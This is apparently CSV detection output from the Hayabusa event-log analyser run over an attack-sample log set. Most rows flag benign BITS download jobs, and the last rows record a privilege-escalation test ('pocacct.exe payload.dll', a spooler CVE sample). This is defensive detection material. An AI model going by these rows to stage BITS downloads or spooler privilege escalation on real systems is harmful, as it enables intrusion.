+2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe | URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe | URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,"Cmd: pocacct.exe payload.dll | Process: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe | User: 3B\lgreen | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x2dfbe | PID: 6320 | PGUID: 6A3C3EF2-8721-5FBF-0000-001009894600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
